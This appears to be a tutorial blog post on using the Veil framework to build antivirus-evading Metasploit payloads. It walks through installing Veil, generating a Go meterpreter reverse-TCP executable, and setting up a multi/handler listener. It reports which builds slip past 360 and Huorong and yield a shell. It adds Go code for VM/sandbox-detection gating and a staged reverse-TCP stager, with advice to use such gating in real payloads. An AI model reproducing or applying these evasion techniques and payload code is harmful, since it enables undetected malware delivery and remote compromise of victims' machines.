A first look at the AV-evasion tool Veil

Installing Veil

Quick install on Kali

apt -y install veil
/usr/share/veil/config/setup.sh --force --silent

Installing in Docker

Add Docker registry mirror addresses (China-side accelerators) by editing /etc/docker/daemon.json:


{
    "registry-mirrors": [
        "https://1nj0zren.mirror.aliyuncs.com",
        "https://docker.mirrors.ustc.edu.cn",
        "http://f1361db2.m.daocloud.io",
        "https://registry.docker-cn.com"
    ]
}

Restart the Docker service

  1. systemctl daemon-reload
  2. systemctl restart docker

Pull the Veil image

  • docker pull mattiasohlsson/veil

Then run

  • docker run -it -v /tmp/veil-output:/var/lib/veil/output:Z mattiasohlsson/veil

This command maps the host directory /tmp/veil-output into the container (the :Z suffix relabels it for SELinux hosts), so payloads generated by Veil are available on the host.


Run docker ps -a to look up the container ID


In a terminal, run sudo docker start -ai 418076aa33ff (using the container ID from the previous step) to attach to the container and enter Veil


Once inside Veil, you can open a second terminal and run docker exec -it 418076aa33ff /bin/bash

to get an interactive shell in the container.

Typing veil there also launches Veil.


Basic use of Veil

Veil has two tools. Evasion generates the payload executables used for file-level AV evasion; Ordnance generates the shellcode that Evasion's shellcode_inject payloads embed (an alternative to msfvenom).

Enter the Evasion tool



Veil>: use 1  # enter the Evasion tool
Veil/Evasion>: list  # list the payloads this tool can generate
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================


 [*] Available Payloads:

        1)      autoit/shellcode_inject/flat.py

        2)      auxiliary/coldwar_wrapper.py
        3)      auxiliary/macro_converter.py
        4)      auxiliary/pyinstaller_wrapper.py

        5)      c/meterpreter/rev_http.py
        6)      c/meterpreter/rev_http_service.py
        7)      c/meterpreter/rev_tcp.py
        8)      c/meterpreter/rev_tcp_service.py

        9)      cs/meterpreter/rev_http.py
        10)     cs/meterpreter/rev_https.py
        11)     cs/meterpreter/rev_tcp.py
        12)     cs/shellcode_inject/base64.py
        13)     cs/shellcode_inject/virtual.py

        14)     go/meterpreter/rev_http.py
        15)     go/meterpreter/rev_https.py
        16)     go/meterpreter/rev_tcp.py
        17)     go/shellcode_inject/virtual.py

        18)     lua/shellcode_inject/flat.py

        19)     perl/shellcode_inject/flat.py

        20)     powershell/meterpreter/rev_http.py
        21)     powershell/meterpreter/rev_https.py
        22)     powershell/meterpreter/rev_tcp.py
        23)     powershell/shellcode_inject/psexec_virtual.py
        24)     powershell/shellcode_inject/virtual.py

        25)     python/meterpreter/bind_tcp.py
        26)     python/meterpreter/rev_http.py
        27)     python/meterpreter/rev_https.py
        28)     python/meterpreter/rev_tcp.py
        29)     python/shellcode_inject/aes_encrypt.py
        30)     python/shellcode_inject/arc_encrypt.py
        31)     python/shellcode_inject/base64_substitution.py
        32)     python/shellcode_inject/des_encrypt.py
        33)     python/shellcode_inject/flat.py
        34)     python/shellcode_inject/letter_substitution.py
        35)     python/shellcode_inject/pidinject.py
        36)     python/shellcode_inject/stallion.py

        37)     ruby/meterpreter/rev_http.py
        38)     ruby/meterpreter/rev_https.py
        39)     ruby/meterpreter/rev_tcp.py
        40)     ruby/shellcode_inject/base64.py
        41)     ruby/shellcode_inject/flat.py

Go and Ruby payloads are generally the recommended choice; the others get caught more readily.

Generating an MSF-compatible payload with Veil



Veil/Evasion>:use 16 

Payload: go/meterpreter/rev_tcp selected

 Required Options:

Name                    Value           Description
----                    -----           -----------
BADMACS                 FALSE           Check for VM based MAC addresses
CLICKTRACK              X               Require X number of clicks before execution
COMPILE_TO_EXE          Y               Compile to an executable
CURSORCHECK             FALSE           Check for mouse movements
DISKSIZE                X               Check for a minimum number of gigs for hard disk
HOSTNAME                X               Optional: Required system hostname
INJECT_METHOD           Virtual         Virtual or Heap
LHOST                                   IP of the Metasploit handler
LPORT                   80              Port of the Metasploit handler
MINPROCS                X               Minimum number of running processes
PROCCHECK               FALSE           Check for active VM processes
PROCESSORS              X               Optional: Minimum number of processors
RAMCHECK                FALSE           Check for at least 3 gigs of RAM
SLEEP                   X               Optional: Sleep "Y" seconds, check if accelerated
USERNAME                X               Optional: The required user account
USERPROMPT              FALSE           Prompt user prior to injection
UTCCHECK                FALSE           Check if system uses UTC time

 Available Commands:
                                                                              
        back            Go back to Veil-Evasion
        exit            Completely exit Veil
        generate        Generate the payload
        options         Show the shellcode's options
        set             Set shellcode option

[go/meterpreter/rev_tcp>>]: set lhost 192.168.15.137  # IP the handler listens on
[go/meterpreter/rev_tcp>>]: set lport 4444  # port the handler listens on
[go/meterpreter/rev_tcp>>]: generate
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 [>] Please enter the base name for output files (default is payload): zfmy123  # the payload is written as zfmy123.exe

When the following screen appears the payload was generated successfully; it is written to /tmp/veil-output/compiled/ on the host (the directory mapped from /var/lib/veil/output in the container).
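The options table above (BADMACS, PROCESSORS, SLEEP and the rest) gates injection behind checks that the payload is not running in a VM or sandbox. As an added example that is not Veil's own template code, the Go program below implements three of those checks in the same spirit: a virtual-NIC OUI lookup for BADMACS, a CPU-count floor for PROCESSORS, and a sleep-acceleration test for SLEEP. The OUI table lists well-known hypervisor prefixes; the threshold values and the MAC strings used for illustration are assumptions, not values taken from the page.

```go
package main

import (
	"fmt"
	"net"
	"runtime"
	"strings"
	"time"
)

// vmOUIs maps well-known virtual-NIC OUI prefixes (first three octets,
// lower-case, colon-separated) to the hypervisor that assigns them.
var vmOUIs = map[string]string{
	"00:05:69": "VMware",
	"00:0c:29": "VMware",
	"00:1c:14": "VMware",
	"00:50:56": "VMware",
	"08:00:27": "VirtualBox",
	"00:15:5d": "Hyper-V",
	"00:16:3e": "Xen",
	"52:54:00": "QEMU/KVM",
}

// Env holds the host facts the checks decide on. Gathering is kept separate
// from deciding so the decision logic can be tested with constructed values.
type Env struct {
	MACs             []string
	NumCPU           int
	SleepAccelerated bool
}

// VMVendorForMAC reports the hypervisor name if mac carries a known virtual
// OUI. It accepts both "00-0C-29-..." and "00:0c:29:..." spellings.
func VMVendorForMAC(mac string) (string, bool) {
	m := strings.ToLower(strings.ReplaceAll(mac, "-", ":"))
	if len(m) < 8 {
		return "", false
	}
	v, ok := vmOUIs[m[:8]]
	return v, ok
}

// SleepLooksAccelerated sleeps for d and reports whether less wall-clock time
// than d actually elapsed, the idea behind the SLEEP "check if accelerated"
// option. Go's time.Sleep does not call the Win32 Sleep API, so a sandbox
// that hooks that API to skip delays is not caught by this Go version.
func SleepLooksAccelerated(d time.Duration) bool {
	start := time.Now()
	time.Sleep(d)
	return time.Since(start) < d
}

// CollectEnv gathers the live host facts the checks need.
func CollectEnv(sleepFor time.Duration) (Env, error) {
	ifaces, err := net.Interfaces()
	if err != nil {
		return Env{}, err
	}
	var e Env
	for _, ifc := range ifaces {
		if len(ifc.HardwareAddr) > 0 {
			e.MACs = append(e.MACs, ifc.HardwareAddr.String())
		}
	}
	e.NumCPU = runtime.NumCPU()
	e.SleepAccelerated = SleepLooksAccelerated(sleepFor)
	return e, nil
}

// SandboxReasons returns one reason per failed check; an empty result means
// the environment passed and the payload would continue to injection.
func SandboxReasons(e Env, minCPUs int) []string {
	var reasons []string
	for _, mac := range e.MACs {
		if vendor, ok := VMVendorForMAC(mac); ok {
			reasons = append(reasons, fmt.Sprintf("BADMACS: %s looks like a %s NIC", mac, vendor))
		}
	}
	if e.NumCPU < minCPUs {
		reasons = append(reasons, fmt.Sprintf("PROCESSORS: %d < %d", e.NumCPU, minCPUs))
	}
	if e.SleepAccelerated {
		reasons = append(reasons, "SLEEP: timer was accelerated")
	}
	return reasons
}

func main() {
	// Assumed thresholds: at least 2 CPUs and a 2 s sleep that must run in full.
	env, err := CollectEnv(2 * time.Second)
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	if r := SandboxReasons(env, 2); len(r) > 0 {
		fmt.Println("refusing to run:", strings.Join(r, "; "))
		return
	}
	fmt.Println("environment checks passed; injection would happen here")
}
```

Keeping the decision in SandboxReasons and the gathering in CollectEnv is what lets the gate be tested without a VM: feed it a constructed Env with a VirtualBox OUI and one CPU and it refuses, feed it a clean one and it passes. The same separation is worth having in a real payload, because each check you add is also a behavioural signature an analyst can look for.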

Setting up the MSF handler

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set lhost 192.168.15.137
lhost => 192.168.15.137
msf6 exploit(multi/handler) > exploit 

Copy the payload to the target machine and run it; it connects back to the handler.
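The handler's payload setting has to match the stager because exploit/multi/handler serves the second stage over the same connection: for a staged reverse_tcp payload it writes a 4-byte little-endian length followed by the stage, and the stager reads exactly that much before executing it. The Go program below is an added example, not Veil's rev_tcp template and not Metasploit code: ReadStage implements the stager's side of that exchange, and ServeStage is a stand-in for the handler so the exchange can be run end to end on loopback. The stage bytes are constructed filler; a real stager would copy the received bytes into executable memory and jump to them, which this example deliberately does not do.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
	"io"
	"net"
)

// maxStage bounds the allocation a broken or hostile handler could force.
// The real stager has no such cap; it is added here as a sanity check.
const maxStage = 16 << 20

// ReadStage implements the stager side of the staged reverse_tcp exchange:
// a 4-byte little-endian length, then exactly that many bytes of stage.
func ReadStage(r io.Reader) ([]byte, error) {
	var hdr [4]byte
	if _, err := io.ReadFull(r, hdr[:]); err != nil {
		return nil, fmt.Errorf("reading length header: %w", err)
	}
	n := binary.LittleEndian.Uint32(hdr[:])
	if n == 0 || n > maxStage {
		return nil, errors.New("implausible stage length")
	}
	stage := make([]byte, n)
	if _, err := io.ReadFull(r, stage); err != nil {
		return nil, fmt.Errorf("reading stage body: %w", err)
	}
	return stage, nil
}

// Stager connects to the handler address (LHOST:LPORT) and fetches the stage.
// It stops at receiving the bytes; no memory is made executable.
func Stager(addr string) ([]byte, error) {
	conn, err := net.Dial("tcp", addr)
	if err != nil {
		return nil, err
	}
	defer conn.Close()
	return ReadStage(conn)
}

// ServeStage is a minimal stand-in for exploit/multi/handler: it accepts one
// connection and sends the length-prefixed stage.
func ServeStage(ln net.Listener, stage []byte) error {
	conn, err := ln.Accept()
	if err != nil {
		return err
	}
	defer conn.Close()
	hdr := make([]byte, 4)
	binary.LittleEndian.PutUint32(hdr, uint32(len(stage)))
	if _, err := conn.Write(hdr); err != nil {
		return err
	}
	_, err = conn.Write(stage)
	return err
}

// RunExchange starts the stand-in handler on a loopback port, runs the stager
// against it and returns what the stager received.
func RunExchange(stage []byte) ([]byte, error) {
	ln, err := net.Listen("tcp", "127.0.0.1:0")
	if err != nil {
		return nil, err
	}
	defer ln.Close()
	errc := make(chan error, 1)
	go func() { errc <- ServeStage(ln, stage) }()
	got, err := Stager(ln.Addr().String())
	if err != nil {
		return nil, err
	}
	if err := <-errc; err != nil {
		return nil, err
	}
	return got, nil
}

func main() {
	// Constructed stand-in for a stage: a real meterpreter stage is a few
	// hundred KB of position-independent code, not these filler bytes.
	stage := []byte("constructed-stage-bytes")
	got, err := RunExchange(stage)
	if err != nil {
		fmt.Println("exchange failed:", err)
		return
	}
	fmt.Printf("stager received %d bytes; a real stager would now execute them\n", len(got))
}
```

Seen from the wire, the whole first exchange is one TCP connection carrying a short header and a large blob of code in the server-to-client direction, which is also why a handler started with the wrong payload type simply hangs the stager: it waits for a length header that never arrives in the expected form.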

Both 360 and Huorong detect it statically.

Using Veil with mingw-w64

Generate a reverse-connect C payload

The steps are the same as above.

The result is a .c source file.

Compile it with mingw-w64

This yields the executable zfmyinfo.exe.

Copy it to the target machine and scan it with Huorong and 360.

Huorong flags the payload immediately, while 360 does not react at all.

Try running the payload

360's dynamic (behavioural) detection catches it.

Veil can also be paired with Cobalt Strike and is quite capable, but 360 and Huorong are simply too strong; whether a given build evades them is partly a matter of luck.

Regenerate a payload and upload it to the target machine again.

360 does not react.

Even with dynamic detection running, we get a shell.

About two minutes later

360 flags it as malicious.

Because AV signatures are updated very quickly, a payload that bypasses some AV products today may no longer do so a few months later. The most dependable approach is to learn reverse engineering and modify the payload code yourself.
